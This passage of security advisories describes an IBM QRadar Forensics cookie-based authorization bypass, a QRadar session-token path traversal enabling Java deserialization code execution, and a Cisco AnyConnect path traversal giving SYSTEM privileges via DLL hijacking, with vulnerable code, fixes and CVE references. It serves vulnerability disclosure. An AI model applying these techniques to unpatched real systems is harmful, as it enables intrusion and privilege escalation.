call to LoginUser() is not made. Not calling LoginUser() also means that
no check is made to validate of the user has permission to use the
Forensics application.

/opt/ibm/forensics/html/DejaVu/qradar_helper.php:
public function LoginCurrentUser ($remember, &$errorInfo)
{
[...]
  if(isset($_COOKIE['QRIF']))
  {
    //if the current cookie is the same as the session token that means user hasn't changed
    //just update the expiry time
    if ($_COOKIE['QRIF'] === $this->session_token)
    {
      //if cookie is available that means it hasn't expired yet so we need to update it's expiry time
      //if cookie expiry time is set to 0 (expire with browser) then we don't update it
      if($cookieExpiryTime > 0)
      {
        unset($_COOKIE['QRIF']);
        setcookie("QRIF", $this->session_token, $cookieExpiryTime, "/", $_SERVER['HTTP_HOST'], true, true);
      }
      return true;
    }
    else
    {
      unset($_COOKIE['QRIF']);
    }
  }
  //first time through, login the user and set the cookie
  $loginSuccess = $this->LoginUser($this->session_token, $errorInfo);
  if ($loginSuccess && $remember) {
    setcookie("QRIF", $this->session_token, $cookieExpiryTime, "/", $_SERVER['HTTP_HOST'], true, true);
  }
  return $loginSuccess;
}

By manually setting a QRIF cookie, it is possible for an authenticated
user without Forensics permissions to access and use most parts of the
Forensics application. It should be noted that after passing the
LoginCurrentUser() method, another method is called that checks if the
user's session is still valid. Meaning that this bypass effectively only
bypasses the Forensics permission check.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200408/authorization-bypass-in-qradar-forensics-web-application.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4274
[3] https://www.ibm.com/support/pages/node/6189705
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management

------------------------------------------------------------------------
QRadar session manager path traversal vulnerability
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A path traversal exists in the session validation functionality of
QRadar. In particular, the vulnerability is present in the part that
handles session tokens (UUIDs). QRadar fails to validate if the
user-supplied token is in the correct format. Using path traversal it is
possible for authenticated users to impersonate other users, and also to
executed arbitrary code (via Java deserialization). The code will be
executed with the privileges of the Tomcat system user.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [2]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM reports that as part of the Session Authenticator rewrite session
information is no longer stored on disk. Consequently, this issue is
mitigated in QRadar 7.3.2 Patch 3 and newer. In addtion, it is stated
that thist issue is resolved in QRadar Community Edition version 7.3.3
[3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [4] is IBM's enterprise SIEM [5] solution. A free version of
QRadar is available that is known as QRadar Community Edition [2]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar web application supports several authentication methods,
including JAAS, basic authentication, OAuth, and token-based
authentication. The token-based authentication uses UUIDs, which either
represents a so-called host token or a file within the /store/sessions/
folder. Whenever QRadar encounters a session token, which is not a host
token, the sessions folder is searched for a file with the same name. If
the file exists, it will be opened and its contents will be
deserialized. The returned object is used to validate the user's
session. In some cases validation is performed on the provided token to
check if it is a properly formatted UUID. Several instances were found
where this validation is not done, allowing for path traversal attacks.

By exploiting this issue it would be possible for an attacker to open a
session file outside the sessions folder. A possible attack scenario
would be if a low privileged user uploads a file to the QRadar server
containing a serialized session object for a different user (eg, Admin)
and thus escalated privileges to that user.

No mitigations have been implemented to prevent deserialization of other
Java objects. Consequently, it is also possible to upload a file
containing other serialized objects. An authenticated attacker can
exploit this vulnerability by uploading a specially crafted (serialized)
object, which amongst other things can result in a denial of service,
change of system settings, or execution of arbitrary code.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Deserialization of the session file happens in the class
com.q1labs.core.shared.sessionmanager.SessionManager. The session file
is retrieved by calling the getFileFromToken() method of the class
com.q1labs.core.shared.sessionmanager.UserSession.

com.q1labs.core.shared.sessionmanager.UserSession:
public static File getFileFromToken(String sessionToken) {
  return new File(NVAReader.getProperty("SESSION_DIR", "/store/sessions/") + sessionToken);
}

As can be seen in the code fragment above, the provided sessionToken
argument is directly concatenated with the SESSION_DIR configuration
property (normally /store/sessions/). If the file exits, its contents is
deserialized by the SessionManager class.

com.q1labs.core.shared.sessionmanager.SessionManager:
private UserSession deserializeSession(String sessionToken) {
  UserSession retSession = null;

  try {
    File sessionFile = UserSession.getFileFromToken(sessionToken);
    if (sessionFile.exists()) {
      if (this.log.isDebugEnabled()) {
        this.log.debug("Session file exists, deserializing...");
      }

      try {
        ObjectInputStream is = new ObjectInputStream(new FileInputStream(sessionFile));
        Throwable var5 = null;

        try {
          retSession = (UserSession)is.readObject();

The call to deserializeSession() is done from the getSession() method of
the same SessionManager class. None of these methods perform any
validation on the session token. The lack of validation allows for
directory traversal attacks if the calling methods also fail to validate
the session token format. Several instances have been found where this
is the case, thus allowing for directory traversal to happen. Some
examples of vulnerable instances include:

- com.q1labs.core.ui.servlet.RemoteJavaScript.doGet() via the sessionId
JSON property.
- com.q1labs.uiframeworks.auth.SessionAuthenticator.doAuthenticate() via
the SEC HTTP request header.
- com.q1labs.uiframeworks.util.RequestUtils.getSessionContext() via the
SEC HTTP request header.

com.q1labs.core.ui.servlet.RemoteJavaScript:
public void doGet(HttpServletRequest req, HttpServletResponse res)
throws RemoteMethodException, IOException, ServletException {
[...]
        try {
          if (jsonRequest.has("sessionId")) {
[...]
            SessionManager sessionManager = SessionManager.getInstance();
            UserSession existingSession = sessionManager.getSession(sessionId);

com.q1labs.uiframeworks.auth.SessionAuthenticator:
protected boolean doAuthenticate(Request request, HttpServletResponse
response) throws IOException {
[...]
      String path;
      UserSession existingSession;
[...]
      path = (String)request.getSession().getAttribute("SEC");
      if (path == null) {
        path = request.getHeader("SEC");
      }

[...]
      if (session.isValid() && path != null) {
        existingSession = SessionManager.getInstance().getSession(path);

com.q1labs.uiframeworks.util.RequestUtils.java:
public static ISessionContext getSessionContext(HttpServletRequest
request, boolean newSession) throws UIFrameworksException {
[...]
    try {
      String sessiontoken = (String)request.getSession().getAttribute("SEC");
      if (sessiontoken == null) {
        sessiontoken = request.getHeader("SEC");
      }

[...]

        userSession = sm.getSession(sessiontoken);

By exploiting this path traversal vulnerability it is possible to load
any session file that is present on the system. Normally, there should
be no session file outside of the /store/sessions folder. However
authenticated users have the possibility to upload files to known
locations. By uploading a session file and abusing the path traversal
vulnerability it ios possible to impersonate any QRadar user. Even more
important, this mechanism allows for the deserialization of Java
objects. It was successfully verified that execution of arbitrary code
is possible by deserializing arbitrary Java objects.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200409/qradar-session-manager-path-traversal-vulnerability.html
[2] https://developer.ibm.com/qradar/ce/
[3] https://www.ibm.com/account/reg/us-en/signup?formid=urx-32552
[4] https://www.ibm.com/security/security-intelligence/qradar
[5] https://en.wikipedia.org/wiki/Security_information_and_event_management

------------------------------------------------------------------------
Cisco AnyConnect elevation of privileges due to insecure handling of
path names
------------------------------------------------------------------------
Yorick Koster, December 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The update functionality of the Cisco AnyConnect Secure Mobility Client
for Windows is affected by a path traversal vulnerability that allows
local attackers to create/overwrite files on arbitrary locations.
Successful exploitation of this vulnerability allows the attacker to
gain SYSTEM privileges.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2020-3153 [2]
- cisco-sa-ac-win-path-traverse-qO4HWBsj [3] - Cisco AnyConnect Secure
Mobility Client for Windows Uncontrolled Search Path Vulnerability
- SSD Advisory [4] - Cisco AnyConnect Privilege Elevation through Path
Traversal

------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was successfully verified on Cisco AnyConnect Secure Mobility
Client for Windows version 4.8.01090.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This vulnerability was fixed in Cisco AnyConnect Secure Mobility Client
for Windows version 4.8.02042. Cisco customers with active contracts can
obtain updates through the Software Center at
https://software.cisco.com/download/navigator.html.

Cisco has released bug ID CSCvs46327 [5] for registered users, which
contains additional details and an up-to-date list of affected product
versions.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Cisco AnyConnect Secure Mobility Client contains functionality to
auto-update itself. Auto-update also works for low-privileged users,
this is possible because the update is initiated from a service running
with SYSTEM privileges (Cisco AnyConnect Secure Mobility Agent). This
service exposes TCP port 62522 on the loopback device to which clients
can connect and send commands to be handled by this service. One of
these commands it to launch the vpndownloader application and update
AnyConnect.

A path traversal vulnerability exists in the vpndownloader application
for Windows that allows a local user to create and run files outside of
the temporary installer folder. Successful exploitation of this
vulnerability allows a local attacker to gain SYSTEM privileges.

------------------------------------------------------------------------
Vulnerability details
------------------------------------------------------------------------
The AnyConnect auto-update functionality has been affected by a number
of vulnerabilities in the past that can be abused by local users to gain
SYSTEM privileges (eg, Kostya Kortchinsky [6], Securify [7], Project
Zero [8], SerializingMe [9]). Cisco has made a number of changes to
mitigate these attacks, amongst these changes are:

- Executables need to have a valid Authenticode signature from Cisco Systems, Inc..
- (New) versions of vpndownloader.exe are copied to %ProgramData%\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader.
- Proper NTFS permissions are (now) set on the %ProgramData%\Cisco\Cisco AnyConnect Secure Mobility Client\ folder.
- The vpndownloader.exe executable must have vpndownloader.exe configured as the original filename in its version information.
- When vpndownloader.exe launches additional installation files, these files also need to have a valid Authenticode signature from Cisco Systems, Inc..
- Installation files are copied in a separate temporary folder under %ProgramData%\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer before they are executed.

In a nutshell, the auto-update mechanism works by sending a message to
the AnyConnect Agent to launch vpndownloader.exe and instruct it to
perform a certain action (as command line argument). This action is
either moving/copying a profile (XML) file to a profile folder or launch
a Cisco signed installer file.

Technically, this doesn't need to be an installer file, any Cisco signed
executable will do. When vpndownloader.exe is instructed to run an
installer file, the file is first copied to a temporary folder under
%ProgramData%\Cisco\Cisco AnyConnect Secure Mobility
Client\Temp\Installer. After the file has been copied, the digital
signature is checked including the signer of the file. If all checks
out, the file is launched from the temporary folder and the folder is
deleted after execution has completed.

Because the executable is copied to a new temporary folder, and the
folder has proper NTFS permissions it is not possible to perform a
file/DLL planting attack to run arbitrary code. In addition, the file
must be signed by Cisco and the signature must be valid, preventing the
execution of arbitrary executables.

A path traversal vulnerability exists in the step where the
(user-supplied) executable is copied into the temporary folder.
vpndownloader.exe will extract the target file name from the source file
name. Essentially it does this by searching for the last occurrence of
the backslash (\) character in the source path, the right part after the
backslash is treated as the file name and is used as the target file
name. AnyConnect does not take into account that the Windows API also
accepts the forward slash (/) as directory separator character. Because
of this it is possible to cause vpndownloader.exe to create files
outside its temporary folder.

Since the signature verification is done after the file is copied, it is
possible for an attacker to copy any file to any location residing on
the same volume as %ProgramData% (generally C:\). Copying of the file is
done with SYSTEM privileges - when vpndownloader.exe is launched through
the AnyConnect Agent. If the target file exists and SYSTEM has write
access to this file, it will be overwritten with the attacker-supplied
file. This alone is enough for a local user to gain elevated privileges.

Another attack scenario is to hijack a DLL that is loaded by a Cisco
signed executable. Most Cisco executables are affected by DLL hijacking,
a common DLL that is used by Cisco applications is the dbghelp.dll file.
The attack consists of two steps:

- Create an attacker-controlled dbghelp.dll file outside of the
temporary folder to prevent removal, traversing one folder up is enough.
- Launch a Cisco signed executable to is vulnerable to DLL hijacking
form the same folder, again using the path traversal vulnerability.

When the Cisco signed executable is launched through the AnyConnect
Agent, it will also run with SYSTEM privileges. The code in the
attacker-controlled DLL will also run with these privileges. The
application itself is opened within Session 0. Windows 10 1803 has
removed [10] the Interactive Services Detection Service, which makes it
impossible for users to interact with any GUI displayed in Session 0.
This of course does nothing to stop an attacker from gaining SYSTEM
privileges, but it does require an additional step for the attacker to
launch a GUI application with elevated privileges.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200419/cisco-anyconnect-elevation-of-privileges-due-to-insecure-handling-of-path-names.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3153
[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj
[4] https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/
[5] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvs46327
[6] https://expertmiami.blogspot.nl/2015/06/cisco-anyconnect-secure-mobility-client.html
[7] /en/advisory/SFY20150601/cisco-anyconnect-elevation-of-privileges-via-dll-side-loading.html
[8] https://bugs.chromium.org/p/project-zero/issues/detail?id=460
[9] https://www.serializing.me/2016/12/14/anyconnect-elevation-of-privileges-part-1/
[10] https://docs.microsoft.com/en-us/windows/deployment/planning/windows-10-removed-features